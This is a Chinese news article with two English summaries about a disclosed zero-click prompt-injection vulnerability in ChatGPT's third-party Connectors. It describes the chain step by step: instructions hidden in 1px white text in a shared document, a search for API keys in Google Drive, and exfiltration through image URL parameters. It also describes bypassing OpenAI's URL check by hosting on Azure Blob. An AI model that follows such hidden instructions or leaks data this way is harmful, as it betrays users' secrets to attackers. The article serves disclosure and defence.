危险！ChatGPT存在"零点击攻击"安全问题。 用户无需点击，攻击者也能从ChatGPT连接的第三方应用窃取敏感数据，甚至窃取API密钥。 一位研究软件安全问题，名为塔米尔·伊沙雅·沙尔巴特（Tamir Ishay Sharbat）的小哥发了篇文章说道。 OpenAI也意识到这种安全漏洞问题，并采取了防范措施，但是仍然抵挡不了攻击者通过其他方法恶意入侵。 也有网友指出，这是规模化的安全问题。 攻击者通过向被连接的第三方应用（如Google Drive、SharePoint等）中传输的文档里注入恶意提示，使ChatGPT在搜索和处理文档时，不知不觉地将敏感 信息作为图片URL的参数发送到攻击者控制的服务器。 这样攻击者就可以窃取敏感数据，甚至API密钥，详细技术操作过程如下。 入侵过程 用户直接把文档上传到ChatGPT让它分析并给出答案。 一起看下怎么回事。 攻击链是怎么形成的 这个漏洞出现在攻击ChatGPT连接第三方应用这个环节。 攻击者会在文档里注入恶意指令，就是在文档中注入一个不可见的提示注入载荷（比如，隐藏在文档中，1px白色字体），然后等待有人将其上传到 ChatGPT并处理，从而AI被诱导执行 ...

Core Viewpoint - ChatGPT has a significant security vulnerability known as "zero-click attack," allowing attackers to steal sensitive data without user interaction [1][2][5]. Group 1: Attack Mechanism - The vulnerability arises when ChatGPT connects to third-party applications, where attackers can inject malicious prompts into documents uploaded by users [9][10]. - Attackers can embed invisible payloads in documents, prompting ChatGPT to inadvertently send sensitive information to the attacker's server [14][18]. - The attack can be executed by malicious insiders who can easily manipulate accessible documents, increasing the likelihood of successful indirect prompt injection [16][17]. Group 2: Data Exfiltration - Attackers can use image rendering to exfiltrate data, embedding sensitive information in image URL parameters that are sent to the attacker's server when ChatGPT renders the image [20][24]. - The process involves instructing ChatGPT to search for API keys in connected services like Google Drive and send them to the attacker's endpoint [29][30]. Group 3: OpenAI's Mitigation Efforts - OpenAI is aware of the vulnerability and has implemented measures to check URLs for safety before rendering images [32][33]. - However, attackers have found ways to bypass these measures by using trusted services like Azure Blob for image hosting, which logs requests and parameters [37][38]. Group 4: Broader Implications and Recommendations - The security issue poses a significant risk to enterprises, potentially leading to the leakage of sensitive documents and data [46]. - Experts recommend strict access controls, monitoring solutions tailored for AI activities, and user education on the risks of uploading unknown documents [48].

Core Insights - Security researchers have disclosed a vulnerability in OpenAI's Connectors that allows attackers to extract sensitive information from Google Drive accounts without user interaction [1][3] - The vulnerability is classified as a "zero-click" attack, requiring only the user's email and shared documents to execute [3] - OpenAI has implemented mitigation measures after being informed of the vulnerability earlier this year, although they have not publicly commented on the issue [3] Company Overview - Connectors is a feature launched by OpenAI for ChatGPT, enabling users to integrate tools and data, search files, pull real-time data, and reference content [3] - The feature currently supports at least 17 different services [3] Security Implications - The attack can only extract limited data per instance and cannot remove entire documents [3] - The rapid response from OpenAI indicates a proactive approach to security following the discovery of the vulnerability [3]